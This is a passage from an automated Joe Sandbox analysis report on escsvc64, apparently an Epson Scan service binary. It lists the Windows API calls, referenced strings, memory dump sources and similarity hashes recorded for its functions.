FreeEnvironmentStringsA 722->726 723->712 724->704 728 140006d65-140006d73 FreeEnvironmentStringsA 725->728 729 140006d0d 725->729 726->712 732 140006d76 728->732 731 140006d10-140006d3b MultiByteToWideChar 729->731 733 140006d3d-140006d63 731->733 734 140006d8e-140006da1 call 140004d30 FreeEnvironmentStringsA 731->734 732->712 733->728 733->731 734->732
            APIs
            • GetEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006BD2
            • GetLastError.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006BEC
            • GetEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C11
            • FreeEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C54
            • FreeEnvironmentStringsW.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C72
            • GetEnvironmentStrings.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006C89
            • MultiByteToWideChar.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006CB7
            • FreeEnvironmentStringsA.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006CF3
            • FreeEnvironmentStringsA.KERNEL32(?,?,?,ProgramFiles(x86),00000000,0000000140002F9B,?,?,00000000,00000001400030CF,?,?,?,?,?,0000000140002290), ref: 0000000140006D99
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
            • String ID: ProgramFiles(x86)
            • API String ID: 1232609184-3631460872
            • Opcode ID: c37cc93dd8c1a900cb13687d03ad4eb6d5e772f06f7a123cf1ea6dbd35c8654b
            • Instruction ID: b63bd8ed9ac3dab9224ed48c9e233b2d44c75ae47e14bd980ce9fa98a46d85b3
            • Opcode Fuzzy Hash: c37cc93dd8c1a900cb13687d03ad4eb6d5e772f06f7a123cf1ea6dbd35c8654b
            • Instruction Fuzzy Hash: CD51A3B170464045FA62DF33B8447A96792EB4DBE0F080725FFAA977F1EA79C4408301
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Service$CountTick$CloseHandleOpenQueryStatus$ManagerSleepStart
            • String ID: EpsonScanSvc
            • API String ID: 1984259928-1444984947
            • Opcode ID: f3d182e5e534bf6b48d903bd0ac76c9d6b4826b5f6df23701516f99d534de01c
            • Instruction ID: a7f394007434b1b02e697beb098547fb0025df285e32183c449bfbd724071357
            • Opcode Fuzzy Hash: f3d182e5e534bf6b48d903bd0ac76c9d6b4826b5f6df23701516f99d534de01c
            • Instruction Fuzzy Hash: 5B314B7130969186FBA6DF17B84479A63A1F7CDBC0F148015FB8E47AA8CE39C645CB00
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: CloseEnumOpen$QueryValuelstrlen
            • String ID: SOFTWARE\WOW6432Node\EPSON\EPSON Scan$Supported
            • API String ID: 2486029594-1622175670
            • Opcode ID: 87ad4f67b9b781d28baa77e7320f6897fffe9f52e03f0c83eb102f117d29a89b
            • Instruction ID: 8e4f15a3a503a55ddbbdac29224ee9fe645b7f6789ebbbbd2d6754d1847acb3f
            • Opcode Fuzzy Hash: 87ad4f67b9b781d28baa77e7320f6897fffe9f52e03f0c83eb102f117d29a89b
            • Instruction Fuzzy Hash: D5818076715B8182EB62CF26F4507EAB3A4F7C97C8F504116EB8907AA4EF79C519CB00
            APIs
            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A41A
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A42A
            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A4E4
            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A591
            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A5B4
            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A5FD
            • LCMapStringW.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A694
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A6D5
            • LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A783
            • LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A836
            • LCMapStringA.KERNEL32(?,?,?,?,?,?,?,?,00000100,00000020,00000020,000000014000AA1A), ref: 000000014000A8BC
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: String$ByteCharMultiWide$ErrorLast
            • String ID:
            • API String ID: 1775797328-0
            • Opcode ID: 60cc79fb6dc40bda5f948520c0e7e0d2ff632d05875a93aef8353d7857435f43
            • Instruction ID: 5f3b594da2a3d9375c03c46df1faf838da500cf477c195cfbbe80b2a65d6330f
            • Opcode Fuzzy Hash: 60cc79fb6dc40bda5f948520c0e7e0d2ff632d05875a93aef8353d7857435f43
            • Instruction Fuzzy Hash: B1E1ADB26007808AEB66CF26B8407E977E1F74DBE8F448615FB6947BE9DB78C5418700
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: Process$BaseCloseEnumHandleModuleModulesNameObjectOpenSingleWaitlstrcmpi
            • String ID: <unknown>$EsDevApp.exe
            • API String ID: 3347754066-197797983
            • Opcode ID: 531f60bc9a968f6c4e8abcd5da6a658d7eb65ae74af477b5c7ef866473c81541
            • Instruction ID: 6cfe2537a428b480afb9f9cbeed3f753b1c7f8177941936a06842b6620a5b642
            • Opcode Fuzzy Hash: 531f60bc9a968f6c4e8abcd5da6a658d7eb65ae74af477b5c7ef866473c81541
            • Instruction Fuzzy Hash: F0416071304A8182EB26DB16F4503EA6391FB8C7C8F844126EB8D57BA5DE3DC246C740
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: AddressHandleModuleProc
            • String ID: .mixcrt$DecodePointer$EncodePointer$KERNEL32.DLL
            • API String ID: 1646373207-1161742486
            • Opcode ID: e729c7a7b6060703b922ff775d9c5f5377de67280fac83615df89c31571cf52b
            • Instruction ID: ab796fa72a7d5732366149f6b830d43232af647d3f7bfa51478b0964a882ca94
            • Opcode Fuzzy Hash: e729c7a7b6060703b922ff775d9c5f5377de67280fac83615df89c31571cf52b
            • Instruction Fuzzy Hash: 1E315872201BA191EB56DB22E848BEB73A5F7487C4F404125EB8D57370EFB9C549C704
            APIs
            • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00454A39
              • Part of subcall function 00456D9C: __GetUnwindTryBlock.LIBCMT ref: 00456DDF
              • Part of subcall function 00456D9C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00456E04
            • Is_bad_exception_allowed.LIBVCRUNTIME ref: 00454B11
            • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00454D5F
            • std::bad_alloc::bad_alloc.LIBCMT ref: 00454E6C
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
            • String ID: csm$csm$csm
            • API String ID: 849930591-393685449
            • Opcode ID: 0c4b8d619ca458689e2f74fd3b4ee5de20de0ba7d33cc5e2b3dde7c6a46069a9
            • Instruction ID: c01b3ce48d01e08d648ae61beddcf9329edb62d70e729643493ad16dd0a7b3f4
            • Opcode Fuzzy Hash: 0c4b8d619ca458689e2f74fd3b4ee5de20de0ba7d33cc5e2b3dde7c6a46069a9
            • Instruction Fuzzy Hash: D4E19730518B088FDB54EF68C4866A977E0FB9831AF50465FE849C7253DB38E989C786
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
            • String ID: csm$csm$csm
            • API String ID: 849930591-393685449
            • Opcode ID: 1c07f995c180fe8b19482931ca148fc83acb38a6c0a0277f61a86655f9e973e5
            • Instruction ID: 44985bc39f6ce64ecd6a895ba7cc64a1c60f2cc549d2f9bd7a277b4e1fad8b73
            • Opcode Fuzzy Hash: 1c07f995c180fe8b19482931ca148fc83acb38a6c0a0277f61a86655f9e973e5
            • Instruction Fuzzy Hash: 3EF1A171518A4C8FEB96EF68C4457E977E0FB58354F10825AF449C7292CF30EA89C786
            APIs
            • FlsGetValue.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E7A
            • GetModuleHandleA.KERNEL32(?,?,?,000000014000717B,?,?,00000000,0000000140006459,?,?,?,?,0000000140003447), ref: 0000000140005E98
            • GetModuleHandleA.KERNEL32 ref: 0000000140005EC5
            • GetProcAddress.KERNEL32 ref: 0000000140005F18
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: HandleModule$AddressProcValue
            • String ID: .mixcrt$EncodePointer$KERNEL32.DLL
            • API String ID: 2623865758-1746336069
            • Opcode ID: d62cb1fb803a255d5fbbc31f8e13c3154414141dc766df3b9e4d7561da73de53
            • Instruction ID: 1ea2a93b65aa6fed410ffae4d9ca497f9c51e7e72b60b0055214cc82254390db
            • Opcode Fuzzy Hash: d62cb1fb803a255d5fbbc31f8e13c3154414141dc766df3b9e4d7561da73de53
            • Instruction Fuzzy Hash: 1B216D71611A9182EB9ADB12F8443AA62A1FB8DB95F481025FB8A476B4EF3DC545C700
            APIs
            • FlsGetValue.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F70
            • GetModuleHandleA.KERNEL32(?,00000000,000002D8,0000000140003765,?,?,000002D8,0000000140007327,?,?,?,?,00000000,0000000140008A7E), ref: 0000000140005F8B
            • GetModuleHandleA.KERNEL32 ref: 0000000140005FB2
            • GetProcAddress.KERNEL32 ref: 0000000140005FF8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: HandleModule$AddressProcValue
            • String ID: .mixcrt$DecodePointer$KERNEL32.DLL
            • API String ID: 2623865758-2532145718
            • Opcode ID: e7bb03dee73054b957bffa576d04ca91cbd153297632be51d16cdfd1f33b3ed2
            • Instruction ID: 94de048c25dcc42fbbcb3b1deb800ddb01b49c7b4c0577e3be6c58809a988402
            • Opcode Fuzzy Hash: e7bb03dee73054b957bffa576d04ca91cbd153297632be51d16cdfd1f33b3ed2
            • Instruction Fuzzy Hash: B0215B71300A5185EA56DF27B8843BA62A1FB4DBD5F980025FB4A472B0EF7DC845C710
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: HandleModule$AddressProcValue
            • String ID: .mixcrt$EncodePointer$KERNEL32.DLL
            • API String ID: 2623865758-1746336069
            • Opcode ID: d0f9a6bdab863bdcd73823ff862c5cac17ebee37e048433f7763a5d36b9a2943
            • Instruction ID: 10474dd8a00d39f69b81620e6a70c0b6e39ead194dd7be9fc042b9424ac9d22a
            • Opcode Fuzzy Hash: d0f9a6bdab863bdcd73823ff862c5cac17ebee37e048433f7763a5d36b9a2943
            • Instruction Fuzzy Hash: 4A216F71300A9195EA6AEF17F8443AA22A1FB4DBD2F580425FB89472B4EF79C545C700
            APIs
            • __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00451F28
            • __scrt_acquire_startup_lock.LIBCMT ref: 00451F7A
            • _RTC_Initialize.LIBCMT ref: 00451FA8
            • __scrt_dllmain_after_initialize_c.LIBCMT ref: 00451FCE
            • __scrt_release_startup_lock.LIBCMT ref: 00451FF9
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
            • String ID:
            • API String ID: 190073905-0
            • Opcode ID: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
            • Instruction ID: 8d53d39933954754376a5d0ce7bf5f3a832d12ddd80edf64ecd2c0ef601a389a
            • Opcode Fuzzy Hash: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
            • Instruction Fuzzy Hash: A081D130718A058BD758AB299A4576B32D1EB5A306F44811FED45C3363DBBCD88E878A
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
            • String ID:
            • API String ID: 190073905-0
            • Opcode ID: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
            • Instruction ID: dc10c060f0ea74d2d5e1af32f94848e2a2faa396c4ff80201887d7c9b88c4984
            • Opcode Fuzzy Hash: e88b1ba4d0b04b46bb75242f07ea3e6da807a9da36daab3af54b39130e8d9f42
            • Instruction Fuzzy Hash: 6A919130618A0D8FF7DAEB6C98457E932D1EB5D380F44C16AB549C3297DE74CA4D8782
            APIs
            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E05A
            • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E079
            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E11F
            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E179
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E1B2
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E1EF
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000E22E
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: ByteCharMultiWide$Info
            • String ID:
            • API String ID: 1775632426-0
            • Opcode ID: 4108598835e914e00f326557e6f51ea859514b5d8428b88a1ae53d3209862e4c
            • Instruction ID: 062fe5d0a4023e3a9fcdfe48f18c9f478e5edbb0d365d0ef86478d7369592790
            • Opcode Fuzzy Hash: 4108598835e914e00f326557e6f51ea859514b5d8428b88a1ae53d3209862e4c
            • Instruction Fuzzy Hash: 0261A0B2304BC08AE762DF23B9447DA66A5F74C7E8F444225BF6967BE4DB74C5518300
            APIs
            • Is_bad_exception_allowed.LIBVCRUNTIME ref: 0045504A
            • std::bad_alloc::bad_alloc.LIBCMT ref: 00455373
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, Offset: 00450000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_450000_escsvc64.jbxd
            Similarity
            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
            • String ID: csm$csm$csm
            • API String ID: 3523768491-393685449
            • Opcode ID: 68eb516bf9c9cba3fb8227e73063fcca90c7209ae9946ac81e4a150aacf18831
            • Instruction ID: 19c14ba3cfc5a4e99b2e2b299346819b8601142df84b7aaceda3e323c9cb08ab
            • Opcode Fuzzy Hash: 68eb516bf9c9cba3fb8227e73063fcca90c7209ae9946ac81e4a150aacf18831
            • Instruction Fuzzy Hash: 6BE1D531918F488FCB14EF28C4916B9B7E0FB5930AF10465EE88587253DB38E589CB86
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861692156.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_180001000_escsvc64.jbxd
            Similarity
            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
            • String ID: csm$csm$csm
            • API String ID: 3523768491-393685449
            • Opcode ID: 78ca78e43d1c9a3decdd43792cedac3c6e57d46113737bad297a5d37f2058efb
            • Instruction ID: a904dc7235edeb2451198f4cfbddd28e7b82c3b5ee9ce0e1ec7a6e0abe0cff3a
            • Opcode Fuzzy Hash: 78ca78e43d1c9a3decdd43792cedac3c6e57d46113737bad297a5d37f2058efb
            • Instruction Fuzzy Hash: 26F1B331518B4C8BEB96EF28C4817EA77E0FB59345F10865DF48587293DF30A689CB82
            APIs
            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E307
            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E31D
            • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E34B
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E3B9
            • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E46C
            • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000E6D1), ref: 000000014000E531
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: StringType$ByteCharMultiWide$ErrorLast
            • String ID:
            • API String ID: 319667368-0
            • Opcode ID: b59b65d0f1a67b05c39a7111098eaa7419e1de460175b2d3e7c8c0e7f43f5c31
            • Instruction ID: 168a81da63108cd0b97bed4d09b5aeb46f306b31fbc8593ad063c360c0888773
            • Opcode Fuzzy Hash: b59b65d0f1a67b05c39a7111098eaa7419e1de460175b2d3e7c8c0e7f43f5c31
            • Instruction Fuzzy Hash: E181CEB2300A8086EB62DF23A9847E967A5F74CBE8F504615FB69677F4EB78C5058700
            APIs
            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AAA8
            • GetLastError.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AABE
              • Part of subcall function 0000000140003790: HeapAlloc.KERNEL32(?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 00000001400037F1
            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AB4E
            • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000ABF5
            • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AC0C
            • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,0000000A,000000014000ADCC), ref: 000000014000AC6B
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861652945.0000000140019000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_140000000_escsvc64.jbxd
            Similarity
            • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
            • String ID:
            • API String ID: 1390108997-0
            • Opcode ID: 1d7edb17a92f29ba27a9ddb9769f6531d5c5bb9e027f7567b246d935c0cd8161
            • Instruction ID: 95f027ec94f94ab459c81f74e7744455635649906aa6b246b78c286b6d19a74f
            • Opcode Fuzzy Hash: 1d7edb17a92f29ba27a9ddb9769f6531d5c5bb9e027f7567b246d935c0cd8161
            • Instruction Fuzzy Hash: FC617AB23006408AEB66DF26A844BD937E5F74EBE8F480215FB594B7E5DB79C841C340
            APIs
            • GetModuleHandleA.KERNEL32(?,?,00001000,00000001400037E5,?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 0000000140006DEF
            • GetProcAddress.KERNEL32(?,?,00001000,00000001400037E5,?,?,?,00000001400089F8,?,?,00000000,00000001400097CA,?,?,?,000000014000392D), ref: 0000000140006E04
            • ExitProcess.KERNEL32 ref: 0000000140006E15
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1861598839.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
            • Associated: 00000000.00000002.1861579205.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861618201.0000000140010000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1861636818.0000000140015000.00000004.00000001.01000000.00000003.sdmpDownload File
